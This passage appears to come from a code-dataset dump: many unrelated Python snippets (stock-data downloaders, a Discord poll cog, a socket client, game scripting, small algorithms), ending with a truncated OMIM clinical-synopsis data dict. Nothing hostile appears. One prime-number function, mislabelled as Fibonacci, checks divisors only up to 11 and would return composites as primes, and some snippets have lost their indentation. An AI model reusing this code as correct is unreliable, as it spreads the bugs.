melhor_id = None  # matricula of the current best grade (was builtin-shadowing `id`)
for _ in range(n):
    m, nota = map(float, input().split())
    if nota > maior:
        maior = nota
        melhor_id = m
if maior >= 8:
    # melhor_id is guaranteed to be set here, since 8 > the initial maior of 0.
    # (The original bound `id` only inside the loop, shadowing the builtin and
    # raising NameError if no grade ever exceeded 0.)
    print(int(melhor_id))
else:
    print("Minimum note not reached")
|
17,049 | ae46d65298453577458eea8854505749cbde0ae4 | # Generate the Fibonacci sequence
def find_primes(num):
primes = []
non_primes = []
for i in range(2, num + 1):
if i % 2 == 0 and i > 2:
non_primes.append(i)
elif i % 3 == 0 and i > 3:
non_primes.append(i)
elif i % 5 == 0 and i > 5:
non_primes.append(i)
elif i % 7 == 0 and i > 7:
non_primes.append(i)
elif i % 11 == 0 and i > 11:
non_primes.append(i)
else:
primes.append(i)
return primes
#code here
# Interactive driver: lazily step through the primes below 1000, one per
# user confirmation.
NUMBER = iter(find_primes(1000))
print(f'The first prime number is {next(NUMBER)}.\n')
# print(f'The prime numbers are: {find_primes(number)}')
while True:
    try:
        CONTINUE = input("Would you like to see the next prime number? (Y/n): ")
        if CONTINUE.lower() == 'y':
            print(f'The next prime number is {next(NUMBER)}.')
            continue
        elif CONTINUE.lower() == 'n':
            print("Exiting")
            break
    except:
        # NOTE(review): this bare except also swallows StopIteration when the
        # iterator is exhausted (and KeyboardInterrupt), printing the
        # "incorrect entry" message instead — confirm that is intended.
        print("Incorrect entry. You must enter Y or n.\n")
        continue
    else:
        # try/except/else: reached only when input was neither 'y' nor 'n'
        # and no exception occurred — the loop then exits silently.
        break
17,050 | 2339567a9db89b09b50608ee14ff5ab12613cffd | #!/usr/bin/env python
import os
import subprocess
from rpyc import Service
from rpyc.utils.server import ThreadedServer
class TestService(Service):
    """ Test Service """
    # RPyC service exposing two ib_send_lat (RDMA latency benchmark) helpers
    # over the soft-RoCE device rxe0. Methods prefixed `exposed_` are callable
    # remotely by RPyC clients.

    def exposed_start_listen(self):
        # Launch the benchmark server side in the background; Popen returns
        # immediately without waiting for the process.
        subprocess.Popen("ib_send_lat -d rxe0 -a -F", shell = True)

    def exposed_start_send(self):
        # Run the client side against 192.168.13.22, blocking until it finishes.
        os.system("ib_send_lat 192.168.13.22 -a -F -d rxe0")
if __name__ == "__main__":
srv = ThreadedServer(TestService, port = 30240, auto_register = False)
srv.start()
print ">>> Server Started!"
|
17,051 | eccd1337ae3e56c58cbbe7b74bd1d0753736f398 | import socket
def run():
    """One-shot TCP client: greet localhost:8081 and print the reply."""
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect(("localhost", 8081))                   # connect to the server
    conn.sendall(bytes("hello from client", "utf-8"))   # queue message in the send buffer
    print(conn.recv(1024))                              # read the response from the recv buffer
    conn.close()                                        # release the socket


if __name__=="__main__":
    run()
17,052 | 24f071da834dfbcec3a595991101d0503a5c8181 | def day1(fileName):
floor = 0
firstBasement = None
with open(fileName) as infile:
chars = infile.readline()
for position, char in enumerate(chars):
if char == '(':
floor += 1
elif char == ')':
floor -= 1
if floor < 0 and firstBasement is None:
firstBasement = position + 1
print(f"Floor: {floor}")
print(f"First basement: {firstBasement}")
if __name__ == "__main__":
day1("1.txt")
|
17,053 | 1054139f7e7df8dd12d9f249bf354cc38d00a006 | import tushare as ts
import pandas as pd
class SHSZData(object):
    """Download, cache and read daily K-line data for SH/SZ stocks via tushare.

    Bars are cached one CSV file per stock code under *data_folder*.
    """
    def __init__(self, data_folder):
        super(SHSZData, self).__init__()
        stocks = ts.get_stock_basics()
        # Drop stocks that have not yet listed (timeToMarket == 0).
        self.stocks = stocks[stocks['timeToMarket'] != 0]
        self.DATA_FOLDER = data_folder

    def _list_start_date(self, row):
        # timeToMarket is stored as an int YYYYMMDD; format as 'YYYY-MM-DD'.
        t = str(row['timeToMarket'])
        return "{}-{}-{}".format(t[:4], t[4:6], t[6:8])

    def download_d_all(self):
        """Download full history (from listing date) for every stock."""
        for code, row in self.stocks.iterrows():
            self.download_d(code, start=self._list_start_date(row))

    def download_d(self, code, start='2000-01-01', end='2023-01-01'):
        """Download daily bars for *code* and write them to its CSV cache."""
        print(f"Downloading {code}...")
        df = ts.get_k_data(code, start=start, end=end)
        df.to_csv(f"{self.DATA_FOLDER}/{code}.csv", index=False)

    def retry_d(self):
        """Re-download any stock whose CSV cache file is missing."""
        from pathlib import Path
        for code, row in self.stocks.iterrows():
            if not Path(f"{self.DATA_FOLDER}/{code}.csv").exists():
                self.download_d(code, start=self._list_start_date(row))

    def update_d_all(self):
        """Append the newest bars for every stock."""
        for code, row in self.stocks.iterrows():
            self.update_d(code)

    def update_d(self, code):
        """Fetch bars newer than the last cached date and append them."""
        print(f"Updating {code}...")
        old_df = self.get_d(code)
        str_latest_date = old_df.iloc[-1]['date']
        start = pd.to_datetime(str_latest_date, format='%Y-%m-%d') + pd.DateOffset(1)
        new_df = ts.get_k_data(code, start.strftime('%Y-%m-%d'))
        if not new_df.empty:
            new_df = new_df.sort_values(by='date')
            # BUG FIX: DataFrame.append was deprecated and removed in
            # pandas 2.0; pd.concat is the supported equivalent.
            df = pd.concat([old_df, new_df], ignore_index=True)
            df.to_csv(f"{self.DATA_FOLDER}/{code}.csv", index=False)

    def get_d(self, code):
        """Read the cached CSV for *code*, sorted ascending by date."""
        df = pd.read_csv(f'{self.DATA_FOLDER}/{code}.csv', delimiter=',', header=0)
        df = df.sort_values(by='date')
        return df

    def get_basic(self, code):
        """Return the tushare basic-info row for *code*."""
        return self.stocks.loc[code]
class SHSZSelection(object):
    """Run a stock-selection function over cached CSV data for a set of equities."""
    def __init__(self, data_folder, selection_func, equities=None):
        super(SHSZSelection, self).__init__()
        self.selection_func = selection_func
        self.DATA_FOLDER = data_folder
        basics = ts.get_stock_basics()
        listed = basics[basics['timeToMarket'] != 0]
        # Default the universe to every listed stock when none is given.
        self.equities = equities if equities else listed.index.values

    def run(self):
        """Apply the selection function to each equity; concat all results."""
        collected = None
        for code in self.equities:
            frame = pd.read_csv(f'{self.DATA_FOLDER}/{code}.csv', delimiter=',', header=0)
            frame = frame.sort_values(by='date')
            picked = self.selection_func(code, frame)
            # pd.concat silently drops the initial None accumulator.
            collected = pd.concat([collected, picked])
        return collected
|
17,054 | b2ff6973060a9d18c4ad7dd7a133e3f4c2f19bb2 |
def armstrong(i):
    """Print 'YES' if i equals the sum of the cubes of its digits, else 'NO'.

    This is the classic 3-digit Armstrong-number check (1, 153, 370, 371,
    407, ...). The verdict is now also returned so callers and tests can use
    it programmatically; callers ignoring the return value are unaffected.
    """
    t = i
    s = 0
    while t > 0:
        # Peel off the last digit and accumulate its cube.
        t, d = divmod(t, 10)
        s += d * d * d
    verdict = 'YES' if s == i else 'NO'
    print(verdict)
    return verdict


number = int(input())
armstrong(number)
number = int(input())
armstrong(number) |
17,055 | f8c33b3de56964e00d7f8e76e50d4b1a057c36ca | import urllib
import json
import requests
import urllib.request
import pandas as pd
import time
import datetime
from time import localtime, strftime
import numpy as np
import statsmodels.api as sm
df = pd.read_csv('./종단기상관측소.csv',encoding='cp949')
df.columns = df.columns.str.replace(' ','')
def get_Weather_xml():
    """Fetch one AWS day-summary XML file from the KMA open API and print it.

    Cleanup: removed an unused local (`loca`) and the unnecessary
    urllib.request.Request wrapper around a plain GET — urlopen accepts
    the URL string directly.
    """
    url = "https://data.kma.go.kr/OPEN_API/AWSM/2016/09/XML/awsmdays_96.xml"
    data = urllib.request.urlopen(url).read()
    print(data)
# get_Weather_xml()
def get_test():
    """Load sanbul2.csv (cp949-encoded) and print its normalized column names."""
    df2 = pd.read_csv('./sanbul2.csv', encoding='cp949')
    # Strip embedded spaces out of the header names.
    df2.columns = df2.columns.str.replace(' ', '')
    print(df2.columns)
def time_test():
    """Scratch experiments with date/datetime arithmetic against the CSV data.

    BUG FIX: the original called a bare `date.today()`, but only the
    `datetime` *module* is imported (there is no `from datetime import date`),
    so that line raised NameError. It is now qualified as
    `datetime.date.today()`.
    """
    c = datetime.date(2018, 11, 22)
    bc = time.localtime()
    # '시작일' = start-date column of the module-level station dataframe.
    d = df['시작일'][1]
    dt1 = datetime.datetime(2018, 11, 22, 0)
    dt2 = datetime.datetime(2019, 2, 23, 0)
    datetime.date.today()  # was bare `date.today()` — NameError
    print(c)
    print(d)
    print(bc)
    print(dt1 - dt2)
# time_test()
def t_test():
# Read the data set into a pandas DataFrame
churn = pd.read_csv('hong2.csv', sep=',', header=0,encoding='cp949')
churn.columns = [heading.lower() for heading in \
churn.columns.str.replace(' ', '_').str.replace("\'", "").str.strip('?')]
# churn.loc[churn['피해면적_합계'] < 0.5, '피해면적'] = 1
# churn.loc[churn['피해면적_합계'] >= 0.5, '피해면적'] = 2
# churn.loc[churn['피해면적_합계'] >= 1, '피해면적'] = 3
# churn.loc[churn['피해면적_합계'] >= 2, '피해면적'] = 4
# churn.loc[churn['피해면적_합계'] >= 3, '피해면적'] = 5
# churn.loc[churn['피해면적_합계'] >= 5, '피해면적'] = 6
# churn.loc[churn['피해면적_합계'] >= 7, '피해면적'] = 7
# churn.loc[churn['피해면적_합계'] >= 13, '피해면적'] = 8
# churn.loc[churn['피해면적_합계'] >= 50, '피해면적'] = 9
# churn.loc[churn['피해면적_합계'] >= 200, '피해면적'] = 10
# churn['churn01'] = np.where(churn['churn'] == 'True.', 1., 0.)
# churn['total_charges'] = churn['day_charge'] + churn['eve_charge'] + \
# churn['night_charge'] + churn['intl_charge']
dependent_variable = churn['산불']
independent_variables = churn[['기온','습도','풍속','풍향']]
independent_variables_with_constant = sm.add_constant(independent_variables, prepend=True)
logit_model = sm.Logit(dependent_variable, independent_variables_with_constant).fit()
print(logit_model.summary()) # error 발생
# print("\nQuantities you can extract from the result:\n%s" % dir(logit_model))
print("\nCoefficients:\n%s" % logit_model.params)
print("\nCoefficient Std Errors:\n%s" % logit_model.bse)
t_test()
def test2():
# Read the data set into a pandas DataFrame
churn = pd.read_csv('churn.csv', sep=',', header=0)
churn.columns = [heading.lower() for heading in \
churn.columns.str.replace(' ', '_').str.replace("\'", "").str.strip('?')]
churn['churn01'] = np.where(churn['churn'] == 'True.', 1., 0.)
churn['total_charges'] = churn['day_charge'] + churn['eve_charge'] + \
churn['night_charge'] + churn['intl_charge']
dependent_variable = churn['churn01']
independent_variables = churn[['account_length', 'custserv_calls', 'total_charges']]
independent_variables_with_constant = sm.add_constant(independent_variables, prepend=True)
logit_model = sm.Logit(dependent_variable, independent_variables_with_constant).fit()
print(logit_model.summary()) # error 발생
# print("\nQuantities you can extract from the result:\n%s" % dir(logit_model))
print("\nCoefficients:\n%s" % logit_model.params)
print("\nCoefficient Std Errors:\n%s" % logit_model.bse)
# test2() |
17,056 | a8ae9946f55679b2b3aace8e92ab69c16ffd4dae | Start_Block=Besiege.GetBlock("5c19343b-d7d5-4913-b78f-b1c5b63ba54b")
Front_Left_Wheel=Besiege.GetBlock("ef13b691-c552-45ac-a4aa-1cd578d3f440")
Front_Right_Wheel=Besiege.GetBlock("b2c35c71-a60f-4757-b9c8-a5f39fec1079")
Rear_Left_Wheel=Besiege.GetBlock("b2b8eda7-affb-4020-8294-3b1ccc1e811a")
Rear_Right_Wheel=Besiege.GetBlock("cc8c86f9-21cc-4950-9421-b21a151ad1d0")
Rear_Left_Wheel_1=Besiege.GetBlock("dd1677db-1594-45f7-80e5-33b38222be70")
Rear_Right_Wheel_1=Besiege.GetBlock("68f06512-0fb6-438b-906d-a47e0c1a1771")
Left_Hinge=Besiege.GetBlock("eaa31090-0c47-4e69-b9ef-4e3763c1f78f")
Right_Hinge=Besiege.GetBlock("6815a701-e291-424c-a8c4-fe41b79895ac")
Left_Momentum=Besiege.GetBlock("2bdbb7e4-478f-46c0-99bf-8638d59d872c")
Right_Momentum=Besiege.GetBlock("7f53b023-a9fc-40c3-a498-57226fac4d44")
cd=0
def FixedUpdate():
global cd
v3=Start_Block.Velocity
v1=(v3.x**2+v3.y**2+v3.z**2)**0.5
c=-0.00581728+0.0711999*v1+0.000212488*v1**2-3.84276*10**-6*v1**3+4.34906*10**-8*v1**4
if c>4:
c=4
if Input.GetKey(KeyCode.DownArrow) and c>2.5:
c=2.5
if Input.GetKey(KeyCode.UpArrow):
cd=1
if Input.GetKey(KeyCode.DownArrow):
cd=0.5-2*c
vfl=c+cd
vfr=c+cd
vrl=c+cd
vrr=c+cd
al=0
ar=0
vl=5
vr=5
if Input.GetKey(KeyCode.LeftArrow):
al=30
ar=25
if Input.GetKey(KeyCode.RightArrow):
al=-25
ar=-30
if Left_Hinge.GetAngle()>=0 and Right_Hinge.GetAngle()>=0:
vl=2.5
vr=3
if Left_Hinge.GetAngle()<=0 and Right_Hinge.GetAngle()<=0:
vl=3
vr=2.5
if Left_Hinge.GetAngle()>=0 and Right_Hinge.GetAngle()>=0 and Input.GetKey(KeyCode.RightArrow):
vfl=vfl*1.18275
vfr=vfr*0.893188
vrl=vrl*0.631579
vrr=vrr
if Left_Hinge.GetAngle()<=0 and Right_Hinge.GetAngle()<=0 and Input.GetKey(KeyCode.LeftArrow):
vfl=vfl*0.893188
vfr=vfr*1.18275
vrl=vrl*0.631579
vrr=vrr
Front_Left_Wheel.SetSliderValue("SPEED",vfl)
Front_Right_Wheel.SetSliderValue("SPEED",vfr)
Rear_Left_Wheel.SetSliderValue("SPEED",vrl)
Rear_Left_Wheel_1.SetSliderValue("SPEED",vrl)
Rear_Right_Wheel.SetSliderValue("SPEED",vrr)
Rear_Right_Wheel_1.SetSliderValue("SPEED",vrr)
Left_Momentum.SetSliderValue("SPEED",c*1.5)
Right_Momentum.SetSliderValue("SPEED",c*1.5)
Left_Hinge.SetAngle(al)
Right_Hinge.SetAngle(ar)
Left_Hinge.SetSliderValue("ROTATION SPEED",vl)
Right_Hinge.SetSliderValue("ROTATION SPEED",vr)
Besiege.Watch("Speed",round(v1*3.6)) |
17,057 | 893c7c897103cb88b6d3c44ba6a332847fcff708 | import discord
import asyncio
from discord.ext import commands
import random
class Poll(commands.Cog):
    """Cog providing a reaction-based poll command."""

    def __init__(self, bot):
        self.bot = bot

    @commands.command(pass_context=True, aliases=['poll'])
    async def sondage(self, ctx, question, options: str, emojis: str):
        """Create a poll embed and seed it with one reaction per option.

        *options* and *emojis* are '+'-separated lists and must have at
        least two entries, with one emoji per option.
        """
        await ctx.message.delete()
        author = ctx.message.author

        # Parse the '+'-separated argument strings into lists.
        option = options.replace("+", " ").split(" ")
        emoji = emojis.replace("+", " ").split(" ")

        # BUG FIX: the original compared len() of the *raw strings* instead of
        # the parsed lists, and fell through (no return) after reporting an
        # emoji-count mismatch.
        if len(option) <= 1:
            await ctx.send("Erreur, vous devez avoir plusieurs options.")
            return
        if len(emoji) < len(option):
            await ctx.send("Erreur, vous devez avoir le même nombre d'options.")
            return

        # One line per option: "<emoji> <label>" (underscores become spaces).
        lines = []
        for x, _ in enumerate(option):
            lines.append('\n {} {}'.format(emoji[x], option[x].replace("_", " ")))
        embed = discord.Embed(title=question, colour=discord.Colour.from_rgb(210, 66, 115), description=''.join(lines))
        react_message = await ctx.send(embed=embed)
        for reaction in emoji[:len(option)]:
            await react_message.add_reaction(reaction)
        embed.set_footer(text=f'ID Sondage : {react_message.id} \nAuteur du sondage : {author}')
        await react_message.edit(embed=embed)
# Entry point used by discord.py's extension loader (bot.load_extension).
def setup(bot):
    bot.add_cog(Poll(bot))
|
17,058 | ed3b0bbe062a526fa9845cb6fce7093f1981da76 | # =============== For Translator ================================
from googletrans import Translator
sentence = str(input("The sectence: "))
translator = Translator()
tr_sen = translator.translate(sentence, src='ur', dest='en')
s = tr_sen
print(tr_sen.text)
x = translator.translate(str(s), src='en', dest='ur')
print(x.text)
|
17,059 | 11794690df0fc439535f88b1fafc7d2cdedeb7cd | class Solution:
def summaryRanges(self, nums):
result = []
if len(nums) == 0:
return result
temp = str(nums[0])
for i in xrange(1,len(nums)):
if nums[i] != nums[i-1]+1:
if temp == str(nums[i-1]):
result.append(temp)
else:
result.append(temp+'->'+str(nums[i-1]))
temp = str(nums[i])
if temp != str(nums[-1]):
result.append(temp+'->'+str(nums[-1]))
else:
result.append(temp)
return result
a = Solution()
print a.summaryRanges([0])
|
17,060 | 7709289bd2511b66cca64b62d03b3eda7f992886 | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
from typing import Optional
import attr
from marshmallow3_annotations.ext.attrs import AttrsSchema
@attr.s(auto_attribs=True, kw_only=True)
class GenerationCode:
    """Generation/DDL code associated with a resource."""
    key: Optional[str]     # unique identifier; may be absent
    text: str              # the code itself (required)
    source: Optional[str]  # origin of the code; may be absent
class GenerationCodeSchema(AttrsSchema):
    """Marshmallow schema auto-derived from the GenerationCode attrs class."""
    class Meta:
        target = GenerationCode
        register_as_scheme = True
|
17,061 | 8448c024c1bb5ba3b227d03545a78e744067300c | omim = {'omim': {
'version': '1.0',
'searchResponse': {
'search': '*',
'expandedSearch': '*:*',
'parsedSearch': '+*:* ()',
'searchSuggestion': None,
'searchSpelling': None,
'filter': '',
'expandedFilter': None,
'fields': '',
'searchReport': None,
'totalResults': 7368,
'startIndex': 6200,
'endIndex': 6219,
'sort': '',
'operator': '',
'searchTime': 3.0,
'clinicalSynopsisList': [
{'clinicalSynopsis': {
'mimNumber': 613364,
'prefix': '%',
'preferredTitle': 'SPASTIC PARAPLEGIA 41, AUTOSOMAL DOMINANT; SPG41',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'genitourinaryBladder': 'Urinary urgency {SNOMEDCT:75088002} {ICD10CM:R39.15} {ICD9CM:788.63} {UMLS C4553976,C0085606 HP:0000012} {HPO HP:0000012 C0085606,C3544092,C4020898}',
'muscleSoftTissue': 'Mild weakness of the small hand muscles {UMLS C3278778}',
'neurologicCentralNervousSystem': '''Spastic paraplegia {SNOMEDCT:192967009} {UMLS C0037772 HP:0001258} {HPO HP:0001258 C0037772};\nSpastic gait {SNOMEDCT:9447003} {ICD10CM:R26.1} {UMLS C0231687 HP:0002064} {HPO HP:0002064 C0231687};\nLower limb muscle weakness, proximal {UMLS C1866010 HP:0008994};\nHyperreflexia {SNOMEDCT:86854008} {UMLS C0151889 HP:0001347} {HPO HP:0001347 C0151889}''',
'miscellaneous': '''Average age at onset 16.6 years {UMLS C3278779};\nOne 4-generation Chinese family has been reported (as of 04/2010) {UMLS C3278780}''',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': True,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': False,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613307,
'prefix': '#',
'preferredTitle': 'DEAFNESS, AUTOSOMAL RECESSIVE 79; DFNB79',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckEars': 'Hearing loss, sensorineural, progressive (severe to profound) {UMLS C4229862} {HPO HP:0000408 C1843156}',
'miscellaneous': '''Dutch, Pakistani, and Moroccan families have been described {UMLS C4229860};\nOnset of hearing loss in first decade of life {UMLS C4229859}''',
'molecularBasis': 'Caused by mutation in the taperin gene (TPRN, {613354.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613308,
'prefix': '#',
'preferredTitle': 'DIAMOND-BLACKFAN ANEMIA 9; DBA9',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthOther': 'Growth retardation {SNOMEDCT:59576002,444896005} {UMLS C0151686 HP:0001510} {HPO HP:0001510 C0151686,C0456070,C0878787,C1837385,C3552463}',
'headAndNeckFace': 'Cathie facies {UMLS C4314925}',
'headAndNeckNeck': 'Webbed neck (rare) {UMLS C3554266} {HPO HP:0000465 C0221217}',
'hematology': 'Anemia {SNOMEDCT:271737000} {ICD10CM:D64.9} {ICD9CM:285.9} {UMLS C0002871,C4554633,C1000483 HP:0001903} {HPO HP:0001903 C0002871,C0162119}',
'laboratoryAbnormalities': 'Vitamin D deficiency {SNOMEDCT:34713006} {ICD10CM:E55,E55.9} {ICD9CM:268,268.9} {UMLS C0042870 HP:0100512} {HPO HP:0100512 C0042870}',
'miscellaneous': '''Some patients are steroid responsive {UMLS C4314939};\nAge at diagnosis ranged from birth to 12 years {UMLS C4314844};\nLimited clinical information provided {UMLS C4230773}''',
'molecularBasis': 'Caused by mutation in ribosomal protein S10 (RPS10, {603632.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 613309,
'prefix': '#',
'preferredTitle': 'DIAMOND-BLACKFAN ANEMIA 10; DBA10',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'growthHeight': 'Short stature (in some patients) {UMLS C2751301} {HPO HP:0004322 C0349588}',
'growthOther': 'Poor growth (in some patients) {UMLS C3280954} {HPO HP:0001510 C0151686,C0456070,C0878787,C1837385,C3552463}',
'headAndNeckFace': '''Mandibulofacial dysostosis (in some patients) {UMLS C4229856} {HPO HP:0005321 C0242387};\nMicrognathia (in some patients) {UMLS C3277936} {HPO HP:0000347 C0025990,C0240295,C1857130} {EOM ID:8bbf61b4ad7ca2ef IMG:Micrognathia-small.jpg};\nMalar hypoplasia (in some patients) {UMLS C4229855} {HPO HP:0000272 C1858085,C4280651} {EOM ID:81db216382f501fc IMG:Malar_Flattening-small.jpg}''',
'headAndNeckEars': '''Microtia (in some patients) {UMLS C4229854} {HPO HP:0008551 C0152423};\nExternal auditory canal atresia (in some patients) {UMLS C4229853} {HPO HP:0000413 C1398325,C1840305,C1857079,C1866190};\nLow-set ears (in some patients) {UMLS C3553628} {HPO HP:0000369 C0239234};\nPosteriorly rotated ears (in some patients) {UMLS C3550632} {HPO HP:0000358 C0431478};\nConductive hearing loss (in some patients) {UMLS C3276776} {HPO HP:0000405 C0018777}''',
'headAndNeckNose': 'Choanal atresia (in some patients) {UMLS C3552333} {HPO HP:0000453 C0008297}',
'headAndNeckMouth': 'Cleft palate (in some patients) {UMLS C3275332} {HPO HP:0000175 C0008925,C2981150}',
'headAndNeckNeck': 'Wide neck (in some patients) {UMLS C4229852} {HPO HP:0000475 C1853638} {EOM ID:1f45b748bb5aa8fe IMG:Neck,Broad-small.jpg}',
'cardiovascularHeart': 'Ventricular septal defect (in some patients) {UMLS C1843489} {HPO HP:0001629 C0018818}',
